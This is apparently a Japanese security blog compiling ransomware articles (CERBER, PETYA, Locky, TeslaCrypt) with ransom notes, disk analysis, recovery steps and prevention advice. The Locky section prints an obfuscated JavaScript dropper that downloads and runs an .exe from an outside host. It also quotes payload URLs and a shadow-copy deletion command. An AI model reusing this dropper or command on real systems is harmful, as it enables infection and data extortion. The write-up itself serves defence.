ウイルス、マルウェア(Malware)

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

キーワード: Ransomware, ランサムウェア, 復号, 解除, 暗号化, 解除ツール, 復号ツール, Decryptor 

 

このエントリーをはてなブックマークに追加

1. CERBER 概要

スポンサーリンク

ランサムウェア(ransomware)とは、感染するとハードディスク内のファイルを勝手に暗号化して脅迫し、復号・解除キーと引き換えに金銭を要求するマルウェア(ウイルス)です。ランサムウェアには、CryptoLocker や TeslaCrypt、 Locky など多くの種類があります。これらのランサムウェアは、暗号化すると脅迫文を表示して金銭を要求するものでしたが、CERBER と呼ばれるマルウェアは音声で脅迫します。また、身代金の支払い期限が設定されており、期限が過ぎると身代金の金額を吊り上げ、支払いを迫ります。

ランサムウェア CERBER は、メール添付ファイル経由より、改ざんされたウェブサイトや広告にアクセスすることで感染するケースが多いようです。改ざんされウェブページにアクセスすると、ウェブブラウザのプラグインである Flash Player や Java などの脆弱性を攻撃するエクスプロイトキット (Magnitude Exploit Kit や Rig Exploit Kit など) を設置したサイトにリダイレクトされ、攻撃が成功すると Cerber がダウンロード実行されて感染します。

CERBER は、何度かバージョンアップされており、2016年11月末にはデータベースファイルを暗号化する機能を追加したバージョン 4.x が確認されています。トレンドマイクロの調査によると、CERBER 4.0 で暗号化対象となるデータベースファイルとしては、Microsoft Access、SQL Server, MySQL, Oracle、MySQL のほか、会計ソフト、給与計算ソフト、医療管理データベースソフトウェアに関連するファイルも含まれています。

2. CERBER による暗号化と脅迫文

CERBER に感染後のデスクトップ画面

他のランサムウェア(ransomware)と同じく、感染後にディスクトップの壁紙が脅迫文に変更されます。

cerber4

CERBER の脅迫文

脅迫文は多数の言語に対応しており、日本語に対応しています。ファイル形式は、HTML ではんく HTA 形式となっています。

cerber0

3. CEBER で暗号化されたファイルの復号方法(1回のみ)

CERBER の脅迫文に記載されているパーソナルページで、無料で 1つファイルの復号を試すことができます。

※ 購入を推奨している訳ではありません。

Tor ブラウザで脅迫文に記載されているパーソナルページにアクセスすると、言語を選択する画面が表示されます。日本語、中国語、ロシア語など多くの言語に対応しているようです。

cerber1

ロボットアクセス回避のためのキャプチャ認証が入っていました。

セキュリティ上の理由のため、以下でロボットではなく、ヒトであることを確認してください。

cerber2

メニュー画面が表示されます。支払い期限の時間などが表示されています。このページの上部に「1つのファイルを無料で復号化」というメニューがあります。

ドキュメント、写真、データベース、その他の重要なファイルは暗号化されています!

ファイルを復号するには、特別なソフトウェア - <<Cerber Decryptor>> をご購入いただく必要があります。
すべての取引は bitcoin ネットワーク内でのみ実行されます。
これから5日間だけ、B1.000の特別価格でこの製品をお求めいただけます。
5日経過後は、この製品の価格はB2.000になります。

スポンサーリンク

cerber3

上記メニューから「1つのファイルを無料で復号化」にアクセスすると、無料で1つのファイルを復号できる特別な機会!」と書かれたページが表示されます。「ファイルをアップロード」のボタンを押して、復号したいファイルを選びます。復号できるファイルは、サイズが2048バイトまでになっています。

今なら、無料で1つのファイルを復号化できる特別な機会!
サービスが本当に役に立つかどうかを確認後、<<Cerber Decryptor>> プログラムにお払い頂いた後で、1つのファイルを復号化することができます

cerber6

復号が成功すると「復号化されたファイルのダウンロード」というボタンが表示されるので、クリックしてダウンロードします。

cerber8

ダウンロードされるファイル名は Decrypted.zip となっており、解凍・展開すると復号されたファイルが確認できました。

cerber10

4. CERBER で暗号化されたファイルの復号方法

スポンサーリンク

初期の CERBER バージョン1 については、トレンドマイクロからファイルの暗号化を解除するツール( Ransomware File Decryptor )が提供されています。

5. 関連URL

PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

 

スポンサーリンク

 

キーワード: PETYA、ウイルス、マルウェア、ランサムウェア、復元、復号、復旧、decrypt、MBR、MFT、ransomware, Virus

このエントリーをはてなブックマークに追加

 

目次

 
   

1. PETYA ウイルスとは

   

2. PETYA ウイルス感染時の画面

   

3. 書き換えられたMBR、MFTなど

   

4. ファイルの復旧について

   

5. 暗号化されたディスクの復号方法

 

1. PETYAウイルスとは

 

PETYAウイルスは、感染するとMBRMFT(マスターファイルテーブル)を上書きしてPCを起動不能するランサムウェアの一種です。PETYAウイルスを実行すると、Windowsが急に落ちて、システム再起動が発生します。PCを起動するとドクロマークの絵を表示した後、ハードディスクを軍事レベルのアルゴリズムで暗号化した、復号するための鍵を購入するために手続きをするように要求する文書を表示します。要求額は約0.9 BITCOINになっていました。

 

PETYA ウイルスに感染させてハードディスクの内部を確認したところ、ハードディスク全体が暗号化されている訳ではなく、MBRとMFTが部分的に書き換えられているだけのようでした。ファイルのデータは暗号化されずに残っているようです。また、軍事的なレベルのアルゴリズムで暗号化と書いてありましたが、MFTの書き換えはXOR処理のように見えます。

 

PETYAウイルスのプログラムコードを解析した訳ではなく、ハードディスクの一部を調査しただけなので正確ではないかもしれませんが、ハードディスク内のファイルデータは残っているようです。しかし、MFTが書き換えられているので、ファイル名やデータが格納されている位置(クラスタ番号)などがわからないので、ちゃんと復旧するのは大変そうです。foremost などのデータカービングソフトを使えば、ヘッダ・フッダが規定されているものについては、ある程度自動で復元できそうです。MFTレコード内に直接データが保存される小さなサイズのファイルに関しては、データが書き換えられてしまっていると思います。

 

NTFS 以外のファイルシステムの場合どうなるのかは調べられていません。

 

 

2. PETYA ウイルスに感染時の画面

 

スポンサーリンク

 

① PETYAウイルスを実行すると、強制的に Windows が落ちてシステム再起動がかかります。

 

petya_ico

 

②PCが立ち上がると、リカバリのための CHKDSKを実行しているような画面が出てきます。

 

PETAYA-1

 

③ ②が終わると、赤白点滅させながらドクロマークの絵を表示します。

 

PETYA-2PETYA-3

 

④ ハードディスクを暗号化したこと、復号するための鍵の購入方法が表示されます。

 

PETYA-4

 
   

You became victime of the PETYA RANSOMWARE!

   

The harddisks of your computer have been encrypted with an millitary grade encryption algorithm. There is no way to restore your data without a special key. You can purchase this key on the darknet page shown in step 2.

   

To purchase your key and restore your data, please follow these three easy steps:

   

1. Download the Tor Browser at “https://www.torproject.org/”. If you need help, please google for “access onion page”.

   

2. Visit one of the following pages with the Tor Browser:

   

   http://petyaXXXXXXXX

   

   http://petayaXXXXXXX

   

3. Enter your personal decryption code there:

   

   XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX…

   

If you already purchased your key, please enter it below.

 

 

3. 書き換えられたMBR、MFTなど

 

スポンサーリンク

 

 

暗号化されたファイルの復旧する 3 つの方法を紹介します。

 

①第0ブロック MBRの書き換え

 

mbr

 

左が正常なMBR、右がPETYAに書き換えられたMBRです。オフセット 446バイト以降のパーティションテーブルは書き換えられていませんが、前半のブートストラップローダー部分が書き換えられていることがわかります。

 

 

 

②第1ブロックから第33ブロック目の書き換え

 

block1-33

 

第0ブロック目のMBR以降、第1ブロックから第33ブロック目は通常 0x00 になっていますが、PETYAウイルスによって 0x07 で XOR されているように見えます。XORとは限りませんが。

 

 

 

③ 第34ブロック目~第49ブロックまでの書き換え

 

推測ですがPETYAウイルスに感染後に表示されるドクロマークや案内を表示すると思われるプログラムが入っていました。

 

 

 

④ 第50ブロック目以降から第1パーティション直前まで

 

特に書き換えはないようです。

 

 

 

MFT(マスターファイルテーブル)の書き換え

 

MFT-Mirror

 

左が正常なMFTレコードの一部(MFTMirrのレコード)です。右はPETYAウイルスで書き換えられたMFTレコードになります。正常時の0x0の部分からキーを推測して XOR すると一部は戻せました。途中でパターンが変わるので、そのパターンをプログラム解析で確認できれば復号できそうです。

 

時間があればもう少し詳しく調べてみたいと思います。

 

 

 

4. ファイルの復旧について

 

MBR、MFTは書き換えられていますが、ファイルデータはそのまま残っているようなので、試しにファイルが取り出せるか確認してみました。

 

感染前の C:\Windows\notepad.exe が クラスタ番号 169258 から 44 クラスタ分あることが分かっていたので、感染後のハードディスクから該当部分を dd コマンドで取り出してみました。

 
   

# dd if=infected-disk.dd skip=`expr 169258 * 8 + 2048` count=`expr 44 * 8` > notepad.dd

 

notepad.exe は 179,712バイトなので、末尾の余計な部分をバイナリエディタで削って、MD5ハッシュ値を確認します。

 
   

# md5sum notepad.dd      
d378bffb70923139d6a4f546864aa61c  notepad.dd

 

感染前の C:\Windows\notepad.exe の MD5 のハッシュ値である  d378bffb70923139d6a4f546864aa61c と一致しました。少なくともこの部分のファイルデータは書き換えられてないようです。

 

 

5. 暗号化されたディスクの復号方法

 

暗号化されたディスクを復号するための解除キーを解析してくれるサイト(PETYA-PAY-NO-RANSOM)が公開されています。

 

Petya Ransomware's Encryption Defeated and Password Generator Released http://www.bleepingcomputer.com/news/security/petya-ransomwares-encryption-defeated-and-password-generator-released/

 

PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)

 

上記の PETYA-PAY-NO-RANSOM を利用した PETYA RANSOM の解除を試してみました。暗号化は解除でき、正常にWindowsを起動することが確認できました。試してみた手順を紹介します。

 

PETYA-PAY-NO-RANSOM に下記①②の情報を貼り付けて「Submit」ボタンを押すと、解除キーが表示されます。このキーをPETYA RANSOMWARE のキー入力画面に、入力すると暗号化が解除されて正常にWindowsを起動することができます。

 
   

① 暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報

   

② 暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報

 

上記①②の情報を取得するためのツール Petya Sector Extractor が下記URLで提供さてれています。  Windows 上で動作するGUI プログラムです。

 

http://download.bleepingcomputer.com/fabian-wosar/PetyaExtractor.zip

 

今回は、別途 Windows マシンにHDDをつなぎかえるのが面倒だったため、上記 Petaya Sector Extractor は使わずに、Bootable Linux CD でブートして dd コマンドと Base64 コマンドで取得する方法にしました。

 

 

(1) Bootable Linux CD で PETYA RANSOMWARE に感染したマシンを起動します

 

Bootable Linux なら何でも良いのですが、今回は Deft Linux を使いました。

 

 

(2) Linux が起動したら下記のコマンドを実行して①②の情報を取得します

 

感染したマシンのハードディスクが、デバイス名 /dev/sda として認識されています。この /dev/sda から該当データを取得することになります。下記、具体的なコマンドになります。

 

①の暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報を取得

 
   

deft ~ % dd if=/dev/sda bs=512 skip=55 count=1 2>/dev/null | base64      
/cc3NxMWNzenSDc3rzs3N+37Nzfq/zc3baU3NyfGNzc3BTc3N8g3N1RtNzdJoTc3K6M3N6tgNzft      
1zc33P03N/7HNzeTFjc3p7Q3N6/9NzftvDc37P83N+3lNzcn2Dc3NTU3N7c3NzdUbTc3SaI3N6um       
NzerZDc3bSg3N9z9Nzf9xzc3E1Y3N6cMNzcvfTc37fw3N+r/NzdtZTc3J8Q3NzMHNzc3iDc3Um03       
N8miNzerIzc3q343N+36Nzff/Tc3/cc3N5NVNzenoDc3r7s3N+07Nzfq/zc3bSU3NyfGNzcxMTc3       
N/c3N1JtNzdJIjc3K6M3N6tkNzdtqDc33/03N/7HNzcT1Tc3pxQ3N687Nzdtujc37P83N+0lNzcn       
2Dc3PzU3N7cINzdTbTc3yWI3N6ulNzerfDc37Tk3N9/9Nzf8xzc3ExY3N6cONzevfDc3bTs3N+r/       
NzdtZTc3J8I3Nz0HNzc3CDc3VW03N0nhNzcrpTc3q2A3N226Nzfe/Tc3/cc3N5NWNzenADc3L/03       
N+38Nzfq/zc3bWU3NyfENzc7PTc3N0g3N1NtNzdJojc3qyM3N6t+Nzdt+Tc33/03N/vHNzeTFjc3       
pww3N688NzftOzc36v83N20lNzcnwjc3OT03NzfINzdSbTc3SeE3NyulNzerYDc3bbo3N979Nzc=

 

②の暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報を取得

 
   

deft ~ % dd if=/dev/sda bs=1 skip=`expr 33 \+ 512 \* 54` count=8 2>/dev/null | base64      
LSgLXoh++aQ=

 

上記コマンド結果を USB メモリや SSH などのネットワーク経由で取得し保存しておきます。

 

 

(3) (2) で得た情報を「PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)」のフォームに貼り付けて Submit します

 

decrypt1

 

しばらくすると解除キーが表示されます。ここでは Your key is: の行にある「XxNxRx3xExTxTxsx」が解除キーになります。

 

decrypt2

 

 

(4) (3)で表示された解除キーを PETYA の画面に入力します

 

decrypt4

 

解除キーを入力すると、復号処理が実行されます。

 

decrypt5

 

しばらくすると復号処理が完了すると、マシン再起動の表示が出ます。

 

decrypt6

 

再起動すると正常にWindowsが起動します。

 

 

 

スポンサーリンク

Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

更新日:
2016-03-29 「感染しないための対策」を追記
2016-03-27 「感染時の動作」、「Locky Decrytor の購入画面」をを追記

Locky Virus - 日本語で身代金を要求するランサムウェアウイルスの対処方法

キーワード: ウイルス、Locky、マルウェア、ランサムウェア、復元、復号、復旧、decrypt, js、javascript、Document2、ransomware, virus, thor, osiris, zzzzz, aesir

このエントリーをはてなブックマークに追加 

目次

1. Locky ウイルスとは

2. 脅迫文

3. 暗号化されたファイルの復旧方法

4. メール添付ファイルの例

5. Locky ウイルスのダウロードURL

6. Locky ウイルス感染時の動作

7. 感染しないための対策

8. 関連リンク

スポンサーリンク

1. Locky ウイルスとは

Locky ウイルスは、感染するとPC内のファイル(テキストやオフィスファイル、画像、動画ファイルなど)を勝手に暗号化してしまうランサムウェアと言われる種類のウイルスです。暗号化されたファイルは、拡張子が「Locky」 となってしまうことから通称「Locky」と呼ばれています。今までのランサムウェアの脅迫文は日本語対応していないものがほとんどでしたが、Locky は日本語環境であれば日本語の脅迫文を作成して表示します。

感染経路としては、メール添付ファイルと脆弱性を攻撃するWebサイトの大きく2つがあります。メール添付ファイルでの感染は、実行すると Locky ウイルスをダウンロードして実行する JavaScriptファイルが含まれた ZIP ファイルが添付されているケースが多いです。その他 rar 拡張子の添付ファイルのケースもあります。また、改ざんされたWebサイトでの感染では、そのWebサイトを見ると Adobe Flash などの脆弱性を攻撃して自動的に Locky Virus をダウンロードして実行する手法(ドライブバイダウンロード)による感染が多く報告されています。このWebサイト経由での感染は、Adobe Flash や IE などのソフトウェアを最新にしておけば感染することはほどんどありません。ランサムウェアなどのウイルスに感染しないように、必ずソフトウェアはアップデートして最新のバージョンにしておきましょう。

1.2. Locky 亜種

Locky ウイルスが出現して間もなく亜種が出回りはじめました。Locky亜種は、初期のLocky と比べて、ダウンロードされるウイルス本体の実行ファイル形式(EXEからDLL形式)や暗号化後のファイル名の形式、拡張子名(.thor.aesir.zzzzz.osirisなどが変わっています。目的はかわらず、感染PC内のファイルを暗号化して人質にして、身代金(ビットコイン支払い)を要求することです。

Locky亜種は、主にメールの添付ファイルとして送られてきます。添付されるファイルの形式は、以下が確認されています。

添付ファイルの形式 ファイルの拡張子
zip zip
The Witcher 2 Game Archive dzip
Microsoft Office doc, docx, docm
  xls, xlsx

zip, dzip などの圧縮ファイルは、展開すると js, wsf, vbs などのスクリプトファイルが入っており、実行してしまうと Locky 亜種の本体であるDLLプログラムをダウンロードして実行します。

doc, docm などのMicrosoft Office のオフィスファイルには、開くと Locky亜種をダウンロードするマクロが入っています。

2. 脅迫文

Locky ウイルスに感染すると表示される日本語の脅迫文です。
  • _Locky_recover_instructions.bmp

_Locky_recover_instructions

  • _Locky_recover_instructions.txt

!!! 重要な情報 !!!!

すべてのファイルは、RSA-2048およびAES-128暗号で暗号化されています。  
RSAの詳細については、ここで見つけることができます:  
http://ja.wikipedia.org/wiki/RSA暗号  
hxxp://ja.wikipedia.org/wiki/Advanced_Encryption_Standard

あなたのファイルの復号化は秘密鍵でのみ可能であり、私たちの秘密のサーバー上にあるプログラムを、復号化します。  
あなたの秘密鍵を受信するには、リンクのいずれかに従います:  
1. hxxp://i3ezlvkoi7fwyood.tor2web.org/AAF92AC11ABCDEF  
2. hxxp://i3ezlvkoi7fwyood.onion.to/AAF92AC11ABCDEF  
3. hxxp://i3ezlvkoi7fwyood.onion.cab/AAF92AC11ABCDEF

このすべてのアドレスが使用できない場合は、次の手順を実行します。  
1. ダウンロードして、Torのブラウザをインストールします: hxxps://www.torproject.org/download/download-easy.html  
2. インストールが正常に完了したら、ブラウザを実行し、初期化を待ちます。  
3. アドレスバーにタイプ: i3ezlvkoi7fwyood.onion/AAF92AC11ABCDEF  
4. サイトの指示に従ってください。

!!! 個人識別ID: AAF92AC11ABCDEF !!!

  • Locky Decryptor 購入画面

暗号化されたファイルを復元するためのソフトウェアである Locky Decryptor の要求額は 1.0 Bitcoin のようです。日本円に換算すると5万円弱くらいでしょうか。暗号化されたファイルの重要性によっては、払ってしまいそうな金額です。

脅迫文と同じく、英語、日本語のほか、韓国語、ドイツ語、フランス語、イタリア語など多くの言語をサポートしています。

身代金を払うことは、犯罪者にお金を払ってしまうことになってしまいますし、犯罪を助長することになってしまうのでお勧めしませんが、バックアップなどから復旧できない大切なデータが被害にあった場合は、身代金を払って復号するしか手はなさそうです。

LockyDecryptor 

3. 暗号化されたファイルの復旧方法

スポンサーリンク

暗号化されたファイルの復旧する 3 つの方法を紹介します。

(1) バックアップから復旧

バックアップから復旧することが一番簡単な方法です。ランサムウェアの被害に限らず、インシデントが発生するとバックアップの大切さがわかります。

(2) ボリュームシャドーコピーからの復旧

Vista/7 以降のWindowsは、標準でファイルの自動バックアップサービスが動いています。ファイルのプロパティのタブで「以前のバージョン」で表示されるものがバックアップされたファイルになります。

いつの時点のボリュームシャドーコピーがあるかなどを確認する方法です。管理者権限のコマンドプロンプトで、vssadmin か wmic コマンドを実行すると表示されます。その他、エクスプローラのフォルダやファイルのプロパティから「以前のバージョン」タブを確認する方法もあります。

> vssadmin list shadows

> wmic.exe shadowcopys

ボリュームシャドーコピーが残っていれば、Shadow Explorer というソフトウェア(http://www.shadowexplorer.com/)を使うことで以前のバージョンのファイルを復元することができます。

Locky ウイルスは、感染時にボリュームシャドーコピーを削除するコマンドを実行します。このコマンドには管理者権限が必要なので、一般ユーザ権限で操作をしていたのであれば削除されずに残っている可能性があります。

(3) アンチウイルスベンダーの復号ツールを使う(未確認)

本当に復号できるのか確認検証できていませんが、下記URL に Locky ウイルスに暗号化されたファイルを復元する方法が記載されています。

How to Decrypt Files Affected by Locky

http://www.im-infected.com/virus/remove-locky-ransomware-virus-removal.html

DrWeb の FTP サイトに復号ツール(ftp://ftp.drweb.com/pub/drweb/tools/te94decrypt.exe)があるようですが、認証が必要でダウンロードできませんでした。DrWeb を購入しているユーザのみに公開されているのかもしれません?。DrWeb のライセンスを持っていないので詳細は不明です。

このツールを使って下記コマンドを実行することにより復号できるようです。(確認できていないので、本当に復元できるか不明です)

te94decrypt.exe -k 85

上記コマンドで復号できない場合は、-k オプションの値を -k 87, -k 88, -k 90, -k 106, or –k186 のように変えて試すとよいようです。

(4) 身代金を支払う

最後の手段ですね。

スポンサーリンク

4. メール添付ファイルの例

Locky ウイルスをダウンロードする JavaScript ファイル (ZIP 圧縮ファイル)を添付したメールの一例です。以下、Locky ウイルスに関するメールの特徴です。

  • 件名は Document 2 が多い
  • 差出人と宛先が自分のメールアドレス
  • 本文はなしが多い
  • 添付ファイルは zip で Locky Virus をダウンロードする js ファイルが含まれている

 

4.1 メール添付ファイルの例

  • Scanned images

件名 Scanned image
差出人 "admin" lands804@nifty.com
日時 Fri, 11 Mar 2016 21:28:25 +0530 (IST India Standard Time)
X-Mailer Internet FAX, MGCS
本文 Image data in PDF format has been attached to this email.
添付ファイル 11-03-2016-0424109259.zip (LUH5654603905.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Fri, 18 Mar 2016 07:36:24 –0500 (EST アメリカ東部)
X-Mailer なし
本文 なし
添付ファイル Document 2.zip (中身は SKS6515937204.js)

  • Message from KFBT_C125

件名 Message from KFBT_C125
差出人 copier@nifty.com
日時 Date: Mon, 21 Mar 2016 10:01:42 -0700 (US,カナダ, メキシコ)
X-Mailer KONICA MINOLTA
本文 なし
添付ファイル SKFBT_C0125690141.zip

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:40:13 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は FAM6542645213.js)

  • Document 2

  
件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:45:47 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は QVR3975568919.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 13:21:42 +0700 (ロシア?)
X-Mailer iPhone Mail
本文 なし
添付ファイル Document 2.zip

  • Locky をダウンロードする Javascript の例(一部)

LUH5654603905.js (一部)

LnOKenpxqU = "If the nodes are siblings, we can do a quick check} else if ( aup === bup ) {return siblingCheck( a, b );";
String.prototype.harmonize = function () { return this.substr(0, 1); };
var zooFq = [("through","sesame","admissions","holes","T")+("scripts","beautify","attacked","arrangements","OQ")+("algeria","cucumber","relation","NF")+"JjAV"+"sY", "c"+("sponsorship","endorsed","finish","JbVL")+"Lh"+"xN", "Expan"+"dE"+"nviron"+"me"+"ntStri"+("stork","sluggish","foxes","ngs"), ""+"%"+("prominent","queens","foregone","susanna","TE")+"MP%", "/BhyIDtNVwP" + ""+"."+("revolve","meyer","shift","reborn","exe"), "R"+("medline","demur","arbitrator","un"), ("tumbler","dense","A")+("craig","repine","tramadol","ct")+"iv"+"eX" + ("compression","brewery","guitar","")+"O"+"bj"+"ect", "QGGOKcpS", "QwMELac", "W"+"Sc"+"ri"+("foxes","torture","pt.") + ("problem","inscribe","melissa","octave","S"), "DKiwgen", ""+("withering","andrew","shorter","h")+"ell", "pVfOLaUink", ("throttle","cowboy","")+("amalgamation","breast","u")+"gb"+"IRD", ""+("guarantee","breastplate","interpreted","M")+"SX"+"ML2" + "."+"XM"+"LH"+("freeze","pounce","immensity","taciturnity","TTP")];
WeuTVCqwr = "Otherwise nodes in our document sort firstap[i] === preferredDoc ? -1 :bp[i] === preferredDoc ? 1 :0;};";   
zooFq.splice(7,2);   
var CTMoXJF = this[zooFq[7 * 8 - 50]];   
HWKBtgugje = "QADrAWHk";   
midnight = (("deleterious", "greenish", "bpRCgjnvY", "astuteness", "pxoHjzpzAa") + "FCIzdg").harmonize()   
publicitys = (("compared", "cheaper", "QBuFHmOIr", "architects", "shvjRYg") + "FjirdbbvG").harmonize()   
zooFq[7] = zooFq[7] + zooFq[9];   
zooFq[8] = "WyGszYG";   
zooFq.splice(8,3);   
var SjBMgLMBX = new CTMoXJF(zooFq[7]);   
SEVPbSzi = "}Walk down the tree looking for a discrepancywhile ( ap[i] === bp[i] ) {i++;";   
var ivPMRM = new CTMoXJF(zooFq[9]);   
rfQhFwb = "}Otherwise we need full lists of their ancestors for comparisoncur = a;while ( (cur = cur.parentNode) ) {ap.unshift( cur );}cur = b;while ( (cur = cur.parentNode) ) {bp.unshift( cur );";   
var giLwRPLp = SjBMgLMBX[zooFq[2]](zooFq[3]) + zooFq[4];   
SWlMAsjacQk = "}return i ?Do a sibling check if the nodes have a common ancestorsiblingCheck( ap[i], bp[i] ) :";   
ivPMRM.onreadystatechange = function () {   
if (ivPMRM[("animal","ferment","wince","r")+"ea"+("drummer","delicious","romany","thinking","dy")+"st"+("contributor","society","projects","oxygen","ate")] === 4) {   
   var aLcJyART = new CTMoXJF(""+"A"+("outlawed","mined","national","DO")+("derek","elizabethan","cleave","whisk","DB.")+("protuberance","stayed","proverbs","")+("terminus","dunno","madness","graphic","S")+"tr"+"eam");   
   aLcJyART.open();   
   KHvCvfBJOh = " return document; };";  

try {

LNqWai= "IE 9\"s matchesSelector returns false on disconnected nodesif ( ret || support.disconnectedMatch ||  As well, disconnected nodes are said to be in a document  fragment in IE 9 elem.document && elem.document.nodeType !== 11 ) {return ret;}} catch (e) {}";   
ivPMRM.open(("symptom","sigma","colin","G")+"ET", "h"+("propagate","thrown","johnny","ttp:")+"//"+("mohawk","impair","chinhu")+"an"+"oi"+"that.c"+"om/s"+"ys"+"te"+"m/logs/u"+"y78hn6"+("hogshead","action","54")+"e.exe", false);BxpYFBq = "} return Sizzle( expr, document, null, [ elem ] ).length > 0; };";   
ivPMRM[publicitys + ("illogical","quick-witted","grape","xerox","e") + (("promote", "moderately", "gnuUtaRFBS", "viscid", "impure", "nYAgsnHqfY") + "DudCuStvIn").harmonize() + (("miner", "squeal", "IKcQRgYhT", "blame", "concord", "dNdviLv") + "crpvqd").harmonize()]();   
RqrXhxjRF = "Sizzle.contains = function( context, elem ) {Set document vars if neededif ( ( context.ownerDocument || context ) !== document ) {setDocument( context );}return contains( context, elem ); };";   
SjBMgLMBX[zooFq[5]](giLwRPLp, 1, "qPdBvBqXfEO" === "HtIxotr"); xcwJYtK = " return val !== undefined ?val :support.attributes || !documentIsHTML ?elem.getAttribute( name ) :(val = elem.getAttributeNode(name)) && val.specified ?val.value :null; };";   
lrGyXANbYvX = "Sizzle.attr = function( elem, name ) {Set document vars if neededif ( ( elem.ownerDocument || elem ) !== document ) {setDocument( elem );";   
} catch (RaRfcWCIw) { };   
xyQVrCFOYxk = "} var fn = Expr.attrHandle[ name.toLowerCase() ],Don\"t get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;";

5. Locky ウイルスのダウロードURL

メールに添付された zip ファイルに含まれる js ファイルを実行すると HTTP アクセスして、Locky Virus をダウンロード実行します。HTTPアクセス先 URL の一例です。

hxxp://timefusewatches.com/system/logs/3523523.exe
hxxp://palat.com/system/logs/98h7b66gb.exe
hxxp://palahasit.com/system/logs/98h7b66gb.exe

/system/logs/*.exe となっているURLが多いようです。

6. Locky ウイルス感染時の動作

メール経由(js を含む添付ファイル)での感染時の動作です。感染してファイルを暗号化された後は、Locky Virus は自身を削除してしまうため残っていません。このため、暗号化された後に、アンチウイルスソフトウェアでフルスキャンしても見つかりません。メール添付されていた zip or Javascript は残っているので、これらが検知されることはあるかもしれません。

  1. Locky Virus をダウンロードするための Javascript を圧縮した zip ファイルを添付したメールが届く
  2. 添付された zip を開いて Javascript ファイル( 例: LUH5654603905.js)を実行すると、Locky Virus である実行ファイルがダウンロード実行される
  3. Volume Shadow Copy サービスで自動バックアップされているファイルをコマンドで削除する「C:\Windows\System32\wbem\WMIC.exeshadowcopydelete/nointeractive」
  4. Locky C2 (コントロール&コマンド)サーバに通信して暗号化に関する情報をやり取り (hxxp://xxxxxxx/main.php、hxxp://xxxxxxx/gate.php へのPOST通信が多い)
  5. ファイルの暗号化処理
  6. 脅迫文を作成して表示
  7. Locky Virus の実行ファイルを削除 「"C:\Windows\system32\cmd.exe" /c DEL %USERPROFILE%\DOCUME~1\TWRPUI~1.EXE」
             

7. 感染しないための対策

  • Adobe Flash Player を最新バージョンにアップデートする
  • Adobe Reader を最新バージョンにアップデートする
  • Java を最新バージョンにアップデートする
  • Internet Explorer を最新バージョンにアップデートする
  • Windows Update のセキュリティパッチをすべて適用する
  • アンチウイルスソフトの最新パターンにアップデートし、リアルタイム検知を有効にする
  • 問題なければ .js 拡張子の関連付けを、Javascript が実行できないプログラム(例えばnotepad.exe など)に変更する
  • js, wsf, vbs などの関連付けを無効にする
  • js, wsf, vbs などに関連付けられた WScript.exe をグループポリシーや権限などで実行禁止する
  • Microsoft Office のマクロ設定を警告表示もしくは無効にする

各種ソフトウェアやプラグインが最新バージョンになっているかは、情報処理推進機構 IPA が提供している MyJVN パージョンチェッカー(http://jvndb.jvn.jp/apis/myjvn/vccheck.html)で確認できます。

8. 関連リンク

ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策

更新日: 2016-01-17

  

ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策

  

続きを読む "ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策" »

PC内のファイルを暗号化して人質に取るウイルス(ランサムウェア)の復旧方法 - CryptoLocker, Crypt0L0cker, CTB-Locker など

PC内のファイルを暗号化して人質に取るウイルス(ランサムウェア)の復旧方法

更新日:2017-01-01 CryptXXX 復号可能に
2016-05-26 TeslaCrypt のマスターキーを公開、身代金を払わずに復号可能に。   


キーワード: ランサムウェア、CryptoLocker、Crypt0L0cker、CryptXXX, Petay, TeslaCrypt、VVV ウイルス、CTB-Locker、CoinVault、復旧、復号、復元ツール, Locky, Locky亜種, aesir, zzzzz, thor, osiris

このエントリーをはてなブックマークに追加  

スポンサーリンク

目次

1. 概要

2. ランサムウェアの種類

3. ランサムウェアを停止する方法

4. ランサムウェアを駆除する方法

5. ランサムウェアに暗号化されたファイルを復旧する方法

6. 関連リンク

1. 概要

PC内のファイルを暗号化して人質に取るウイルス(ランサムウェア)に感染した場合の対処方法について紹介したいと思います。一部のランサムウェアのみの対応ですが、暗号化された大事なファイルを身代金を払わずにファイルを復元する方法についても紹介します。

2. ランサムウェアの種類

PC内のファイルを暗号化して人質に取るウイルスは、ランサムウェア(ransomware)と呼ばれています。ランサムウェアには、いくつかの種類が存在します。種類やバージョンによって対処方法が異なります。

① CryptoLocker

CryptLocker ウイルスに感染して暗号化されたファイルは、拡張子に .encrypted が付加されます。

      

② Crypt0L0cker

CryptoLocker と似ているがアルファベット「o」 が数字の「0 」になっている。 CryptoLocker が英語の脅迫文を出すのに対して、Crypt0L0cker は日本語の脅迫文を表示する。

警告
日本の法律に違反するファイルがお使いのパソコンから検出されたため、パソコンをロックしました。    
ロックの解除をには、左に表示されている日時までに罰金として三十万円をBitcoinで氏は割らなければならない。    
この日時までに誠意ある対応なき場合は、ロックが解除されることは永遠にないでしょう。    
